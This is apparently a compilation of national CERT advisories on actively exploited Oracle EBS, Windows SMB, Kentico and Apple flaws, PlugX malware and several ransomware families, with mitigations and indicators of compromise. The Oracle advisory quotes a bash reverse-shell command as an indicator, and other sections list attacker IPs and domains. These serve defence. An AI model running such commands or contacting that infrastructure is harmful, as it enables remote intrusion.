Advisory ID: NCC-CSIRT-2025-020

Summary: 

CISA has added five newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks against major software products, including Oracle EBS and Microsoft Windows. The new entries include:

• A server-side request forgery (SSRF) issue (CVE-2025-61884) in Oracle EBS that can be triggered without authentication.
• A prior Oracle EBS remote code execution vulnerability (CVE-2025-61882) is already being exploited.
• A Microsoft Windows SMB Client privilege escalation flaw (CVE-2025-33073).
• Authentication bypass vulnerabilities in Kentico Xperience CMS (CVE-2025-2746 & CVE-2025-2747) enabling administrative control.
• An Apple JavaScriptCore arbitrary code execution flaw (CVE-2022-48503) affecting web content processing.

CISA has set a remediation deadline of November 10, 2025, for federal agencies.

Damage/Probability: Critical/High

Product(s): 

• Oracle E‑Business Suite (EBS) – Runtime component/Configurator
• Microsoft Windows SMB Client
• Kentico Xperience CMS
• Apple JavaScriptCore

Version(s): 

• Oracle EBS: vulnerabilities CVE-2025-61884 (SSRF) and CVE-2025-61882 (RCE)
• Microsoft Windows SMB Client: CVE-2025-33073 (improper access control)
• Kentico Xperience CMS: CVE-2025-2746 & CVE-2025-2747 (authentication bypass)
• Apple JavaScriptCore: CVE-2022-48503 (array-index validation)

Platform(s): 

Enterprise ERP systems, Windows client environments, CMS web platforms, Apple/macOS devices using WebKit/JavaScriptCore.

Description: 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalogue, confirming real-world attacks targeting major enterprise and consumer technologies from Oracle, Microsoft, Kentico, and Apple.

Two of the vulnerabilities affect Oracle E-Business Suite (EBS), a Server-Side Request Forgery (SSRF) flaw (CVE-2025-61884) and a Remote Code Execution (RCE) flaw (CVE-2025-61882). These issues reside in the Oracle Configurator runtime component and allow unauthenticated attackers to send crafted HTTP requests that can reach internal services, databases, or cloud resources. Exploitation of these vulnerabilities has been observed in the wild, with some threat actors using them for data exfiltration and lateral movement within enterprise networks.

The third flaw, CVE-2025-33073, impacts the Microsoft Windows SMB Client, where improper access control allows local attackers to escalate privileges. This vulnerability is particularly concerning in enterprise environments that use legacy SMB configurations or lack strict SMB signing and network segmentation, as attackers could exploit it to gain elevated rights and persistence.

Two additional vulnerabilities, CVE-2025-2746 and CVE-2025-2747, affect Kentico Xperience CMS. They stem from improper handling of authentication requests in the staging synchronization component, allowing unauthenticated users to bypass login controls and gain administrative access to web servers. Once exploited, attackers can modify website content, deploy web shells, or redirect users to malicious domains.

Lastly, CVE-2022-48503, a vulnerability in Apple’s JavaScriptCore (used in WebKit-based browsers), results from improper validation of array indices. This flaw allows attackers to execute arbitrary code on macOS and iOS devices when victims visit malicious or compromised websites. Although initially disclosed in 2022, it remains under active exploitation, highlighting how older vulnerabilities continue to be leveraged against unpatched systems.

CISA’s analysis confirms that these vulnerabilities are being actively exploited in the wild, and federal agencies have been mandated to patch affected systems by 10 November 2025. Organizations are strongly advised to prioritize remediation, implement network segmentation where patching cannot be done immediately, and monitor for signs of compromise, particularly unusual HTTP requests, unauthorized administrative access, or suspicious privilege escalation activities.

Impacts: 

• Unauthorized access to enterprise resources via Oracle EBS SSRF or RCE leading to data exfiltration or lateral movement.
• Compromise of Windows clients via SMB Client privilege escalation, enabling attackers to gain elevated rights and persist.
• Administrative takeover of web content and infrastructure via Kentico CMS authentication bypass, enabling further malware deployment or defacement.
• Exploitation of macOS/iOS devices via Apple JavaScriptCore flaw, enabling arbitrary code execution through web content, risking endpoint compromise in enterprise “bring your own device” (BYOD) contexts.
• High risk for organizations that delayed or skipped patching, attackers often move quickly after CVEs are public and listed by CISA’s KEV.

Solutions:  

• Prioritise Patching: Immediately apply vendor patches for the listed CVEs: Oracle EBS, Microsoft Windows (SMB Client), Kentico CMS, Apple devices.
• Confirm Asset Inventory: Ensure you know whether you run affected versions of Oracle EBS, Windows SMB Client endpoints, Kentico CMS installations, or macOS/iOS devices vulnerable to JavaScriptCore exploits.
• Isolate & Segment: Until patched, segregate vulnerable systems, especially Oracle EBS and CMS platforms, with stricter network segmentation and restricted access.
• Harden Configurations: For Windows SMB, enforce SMB signing, disable SMBv1/SMBv2 legacy, and monitor unusual local privilege escalations. For CMS, disable staging sync server access if unused and review user authentication flows.
• Monitor Logs & Network: Look for abnormal HTTP requests from Oracle servers to internal services (SSRF), sudden administrative logins in CMS, privilege escalation events in Windows, or unusual web content processing on Apple devices.
• Validate Remediation: After patching, run vulnerability scans and penetration tests focusing on these CVEs; verify no persistence or backdoor remains.

References:

• https://www.cisa.gov/news-events/alerts/2025/10/20/cisa-adds-five-known-exploited-vulnerabilities-catalog

• https://thehackernews.com/2025/10/five-new-exploited-bugs-land-in-cisas.html

• https://www.scworld.com/brief/oracle-ebs-microsoft-apple-kentico-bugs-added-to-cisas-vulnerabilities-list

• https://vulert.com/blog/cisa-kev-exploited-vulnerabilities-october-2025/ 

Advisory ID:   ngCERT-2025-100005

SUMMARY

ngCERT has detected a critical and easily exploitable vulnerability affecting the Oracle E-Business Suite (EBS) in Nigeria. This vulnerability, assigned 

CVE-2025-61882 could be exploited remotely by an unauthenticated attacker with network access via HTTP to achieve remote code execution (RCE), potentially leading to full system takeover. Assigned a CVSS 3.1 with a base score of 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group; hence, it has been listed in CISA's Known Exploited Vulnerabilities (KEV) Catalogue. There is therefore an urgent need for organisations to update applications and apply patches to safeguard against exploits and possible cyberattacks.

Damage:      Critical (CVSS 3.1 Base Score 9.8)

Probability:  High 

Platform(s):  Oracle e-Business Suite

DESCRIPTION

CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS
versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses, including inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection, and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access crafts malicious HTTP requests to exploit these flaws. The attack begins by leveraging inconsistent request parsing and path traversal to access restricted server resources. By injecting crafted XML payloads, the attacker exploits XXE and XML injection vulnerabilities to manipulate server-side processing. CRLF injection escalates the attack by injecting malicious headers, enabling SSRF to trigger unauthorized server requests. This chain culminates in RCE, allowing the attacker to execute arbitrary commands on the server without authentication.

CONSEQUENCES

Successful exploitation of these flaws could result in:

1. Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
2. Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
3. Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
4. Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
5. Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.

SOLUTION/MITIGATION

To mitigate these vulnerabilities, ngCERT recommends the following measures:

1. Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
2. Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
3. Monitor and Detect: Actively monitor logs for indicators of compromise (IOCs), such as IP addresses (e.g., 200.107.207.26, 185.181.60.11), commands (e.g., sh -c /bin/bash -i >& /dev/tcp/ / 0>&1), or file hashes (e.g., SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d).
4. Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
5. Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
6. Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.

HYPERLINK

• https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
• https://nvd.nist.gov/vuln/detail/CVE-2025-61882
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
• https://www.hipaajournal.com/cl0p-mass-exploiting-zero-day-vulnerability-oracle-e-business-suite/
• https://www.ncsc.gov.uk/news/active-exploitation-vulnerability-affecting-oracle-ebusiness-suite

Advisory ID:   ngCERT-2025-100004

SUMMARY

ngCERT’s attention has been drawn to the resurgence of SOGU, aka PlugX malware infiltration, which poses a significant threat to Nigeria’s cyberspace. The malware is a sophisticated modular Remote Access Trojan (RAT) deployed by Advanced Persistent Threat (APT) actors in cyber-espionage campaigns. These attacks target critical infrastructure across multiple sectors, including telecommunication companies, as observed in current reports. SOGU is also identified as a backdoor with keylogging, surveillance, data exfiltration and stealth capabilities, while disguising itself as legitimate applications to avoid detection. New variants are equally capable of remote code execution, ensuring persistence through Dynamic Link Libraries (DLL) side-loading while implementing new C2 command identifiers. The compromise of critical infrastructure by this malware could result in privacy and data breaches, supply chain risks, financial losses, as well as reputational damage and possibly geopolitical implications. This underscores the need for public and private sector organisations to emplace robust defences to safeguard and mitigate the threats posed by PlugX.

Damage:      Critical

Probability:  High 

Platform(s):  Operating System, Networks and IoTs

DESCRIPTION

The recent PlugX attacks have targeted critical infrastructure, particularly telecommunications networks, by leveraging DLL side-loading for espionage purposes. In the initial access stage, attackers exploit legitimate executables, such as those from Quick Heal's Mobile Popup Application, to initiate DLL search order hijacking or side-loading of a malicious DLL. Notably, new variants also gain initial access by exploiting vulnerabilities in edge devices, such as firewalls and VPNs, and possibly weaknesses in IoTs. To deploy and execute the payload, the malicious DLL decrypts and loads PlugX (alongside variants like RainyDay or Turian) directly into memory using. This is achieved by utilizing Rivest Cypher 4 (a symmetric stream cypher) encryption and shared algorithms to evade disk-based detection. Likewise, the malware employs techniques like control flow flattening, API hashing, and embedded keyloggers to obscure its operations and resist reverse engineering. To ensure persistence and command execution, PlugX establishes long-term access, enabling arbitrary command execution, file uploads/downloads, and keylogging for credential theft and lateral movement within the network. Furthermore, compromised systems facilitate the theft of sensitive data, such as communications metadata, supporting broader cyber-espionage goals against critical sectors.

INDICATORS OF COMPROMISE

The following are observed Indicators of Compromise IoCs:

1. Domains

   a)   [.]relivonline[.]com

   b)   [.]im0[.]site

   c)   [.]frillsforspills[.]com

  d)   [.]365safemail[.]com

2. IPs with Ports

           a) 103[.]79[.]120[.]85:443

           b)  103[.]79[.]120[.]92:443

c)  103[.]79[.]120[.]71:443

d)  103[.]79[.]120[.]71:5000

e)  103[.]107[.]104[.]61:443

f)  103[.]107[.]104[.]61:5000

g)  39[.]105[.]24[.]38:3478

h)  39[.]105[.]24[.]38:443

i)    121[.]201[.]74[.]246:5000

j)   69[.]172[.]75[.]148:5000

k)  154[.]90[.]47[.]123:443

l)   154[.]90[.]47[.]123:5000

m) 45[.]128[.]153[.]73:443

CONSEQUENCES

SOGU aka PlugX malware attacks could result in:

1. Extensive data exfiltration and espionage.
2. Compromise of networks in critical sectors like telecom that can act as vectors for supply chain attacks.
3. Economic and financial losses.
4. Breaches that could further result in reputational damage, customer trust erosion, regulatory fines, and legal scrutiny.
5. Operational disruptions and Denial of Service (DoS) attacks.

SOLUTION/MITIGATION

ngCERT recommends that organisations:

1. Conduct regular security awareness training to help users recognize phishing attempts.
2. Implement advanced email filtering solutions to block malicious emails before reaching end-users.
3. Deploy and maintain up-to-date antivirus solutions capable of detecting PlugX signatures and behaviors.
4. Enforce 2FA to protect access to sensitive systems and applications.
5. Conduct regular analysis of system and network logs to identify anomalies related to PlugX behavior.
6. Ensure the prompt application of patches and updates to all software to minimize exploitation
7. opportunities.
8. Filter network traffic by preventing unknown or untrusted access to remote services on internal systems.
9. Ensure the review of domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.

HYPERLINK

• https://cybersecsentinel.com/the-return-of-plugx-malware-with-fresh-tricks/
• https://thehackernews.com/2025/09/china-linked-plugx-and-bookworm-malware.html
• https://security.googlecloudcommunity.com/community-blog-42/finding-malware-detecting-sogu-with-google-security-operations-3869
• https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx

Advisory ID:   ngCERT-2025-100003

SUMMARY

ngCERT is aware of LockGoga, MegaCortex, and Nefilim, sophisticated and hybrid ransomware variants which have been active from 2019-2021, and linked to a threat actor identified as deadforz with aliases “Boba,” “msfv,” and “farnetwork. These ransomware strains have targeted critical infrastructure, manufacturing, healthcare, and transportation sectors in several countries across the globe, resulting in the loss of millions of US dollars. This underscores the need for Organizations to review their systems for indicators of compromise (IoCs) and strengthen defences against potential affiliate-driven attacks.

Damage:      Critical

Probability:  High 

Platform(s):  Microsoft Windows, Dell Firmware

DESCRIPTION

Notably, LockGoga targets industrial systems by utilizing Advanced Encryption Standard (AES) encryption, and appends ".locked" to files. Initial access is achieved through phishing or stolen Remote Desktop Protocol (RDP) credentials. Thereafter, the malware is dropped in the %TEMP% folder, which disables networks, clears disk space with cipher.exe, encrypts files and demands email-based payment. Also, MegaCortex is a hybrid ransomware used to target enterprises and possesses anti-analysis capabilities. Its attack chain involves initial access through phishing, SQL injection, or RDP exploits. Next, it uses Cobalt Strike for persistence, runs kill.bat to evade antivirus detection, propagates via Qakbot, and demands multi-million-dollar ransoms. Furthermore, Nefilim uses double extortion with AES-128 or Rivest–Shamir–Adleman (RSA-2048) cryptosystem (a family of public-key cryptosystems used for secure data transmission). It also appends ".NEFILIM" or ".DERZKO" to files, while exploiting CVE-2019-19781 (a critical vulnerability in Citrix Application Delivery Controller (ADC) and Gateway products, allowing unauthenticated attackers to execute arbitrary code remotely via a directory traversal flaw). Threat actors also exploit RDP or phishing for initial access. Further, Mimikatz and PsExec/WMI are employed for credential dumping, lateral movement within networks, privilege escalation, and persistence before exfiltrating data to clouds like MEGAsync. Thereafter, the criminals threaten to leak sensitive information.

INDICATORS OF COMPROMISE

The following are observed Indicators of Compromise IoCs:

1. LockGoga: SHA256 hashes in Fortinet/Unit42 reports; %TEMP% execution, cipher.exe use, ".locked" extensions; email-based ransom demands.

2. MegaCortex: Hashes in Heimdal reports; kill.bat, Cobalt Strike beacons, RDP port 3389 activity; Qakbot-related traffic.

3. Nefilim: Delphi-based samples; Mimikatz dumps, PsExec/WMI usage, MEGAsync exfiltration; connections to known exfil domains; Citrix exploit attempts.

CONSEQUENCES

Successful attacks by LockGoga, MegaCortex, and Nefilim ransomware variants could result in:

1. Disruption of operations, supply chain interruptions and possible Denial of Service (DoS) attacks.
2. Financial losses due to ransom payments, recovery costs and General Data Protection Regulation (GDPR) fines.
3. Reputational damage due to data exposure from possible dark web leaks and the possibility of secondary extortion.
4. National security risks occasioned by breaches to defence and sensitive critical infrastructure.

SOLUTION/MITIGATION

ngCERT recommends that organisations:

1. Patch vulnerabilities such as CVE-2019-19781 and RDP, enforce Multifactor authentication, implement Zero Trust and least-privilege access to initial access.
2. Deploy Endpoint Detection and Response (EDR) for behavioural monitoring such as process injection, lateral movement, credential dumping and cloud exfiltration.
3. Maintain offline, immutable backups (3-2-1 rule); test recovery quarterly; avoid ransom payments and report to ngCERT in the event of an attack, to ensure speedy recovery.
4. Block IoCs at firewalls.
5. Conduct regular phishing awareness training for all staff.

HYPERLINK

• https://www.fortinet.com/blog/threat-research/lockergoga-ransomeware-targeting-critical-infrastructure
• https://heimdalsecurity.com/blog/megacortex-ransomware/
• https://www.sisainfosec.com/blogs/nefilim-ransomware/
• https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks